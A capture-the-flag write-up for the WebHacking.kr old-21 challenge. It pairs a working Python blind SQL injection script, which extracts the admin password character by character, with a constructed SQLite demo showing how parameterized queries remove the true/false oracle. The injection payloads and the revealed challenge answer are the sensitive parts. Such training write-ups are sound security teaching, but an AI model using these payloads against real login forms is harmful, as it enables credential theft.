WebHacking.kr Challenge old-21

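Goal: Blind SQL Injection
The challenge is helpful from the start.
The id and pw values are received via GET.
select is filtered.
A true condition returns wrong password
A false condition returns login fail
This difference makes Blind SQL Injection possible.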
```python
import requests

URL = 'https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw='
TRUE_PHRASE = 'wrong password'
# requests expects a cookie-name -> value mapping
c = {"PHPSESSID": "your Session id"}


def query(payload):
    # True when the response contains the "true" phrase
    r = requests.get(URL + payload, cookies=c, timeout=300)
    content = r.text
    return TRUE_PHRASE in content


# 36
def find_pw_length():
    pw_len = 1
    while query("' or id='admin' and length(pw)={}%23".format(pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# there_is_no_rest_for_the_white_angel
# %23 = #
def find_pw():
    pw_len = find_pw_length()
    result_pw = ''
    chk = 0
    for pos in range(1, pw_len + 1):
        chk = 0
        # first pass: character codes 65 and up (letters and later symbols)
        for character in range(65, 133):
            if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)) is True:
                result_pw += chr(character)
                print(result_pw)
                chk = 1
                break
        # second pass: character codes 33-64 (punctuation and digits)
        if chk == 0:
            for character in range(33, 65):
                if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)) is True:
                    result_pw += chr(character)
                    print(result_pw)
                    break
    print('pw: {}'.format(result_pw))


if __name__ == '__main__':
    find_pw()
```
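Why the two responses work as an oracle even with `select` filtered, and how bound parameters remove it, as an added example that is not part of the original post. The server-side query shape, the `users` table, the password `constructed_pw`, the "no hack" filter response and the function names are assumptions, and SQLite stands in for the challenge's database, so the comment marker is `-- ` instead of `#`.

```python
import sqlite3

# Constructed sample data (not the challenge's real table or password).
# Plaintext storage mirrors what the write-up extracts; real systems store hashes.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id TEXT, pw TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'constructed_pw')")


def vulnerable_login(user_id, pw):
    """Assumed flawed check: keyword filter plus string concatenation."""
    if "select" in (user_id + pw).lower():
        return "no hack"             # assumed filter response
    sql = f"SELECT pw FROM users WHERE id='{user_id}' AND pw='{pw}'"
    row = db.execute(sql).fetchone()
    if row is None:
        return "login fail"          # injected condition was false
    if row[0] == pw:
        return "login success"
    return "wrong password"          # injected condition was true: the oracle


def safe_login(user_id, pw):
    """Bound parameters keep input as data; every failure looks the same."""
    row = db.execute(
        "SELECT 1 FROM users WHERE id=? AND pw=?", (user_id, pw)
    ).fetchone()
    return "login success" if row else "login fail"


def length_probe(n):
    # Same condition as the write-up's payload, with SQLite comment syntax.
    return f"' or id='admin' and length(pw)={n}-- "


if __name__ == "__main__":
    for n in (13, 14):
        p = length_probe(n)
        print(n, vulnerable_login("admin", p), "|", safe_login("admin", p))
```

The probe contains no `select`, so the keyword filter never triggers; only the parameterized version returns the same answer for true and false conditions.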
 2023. absolroot all rights reserved.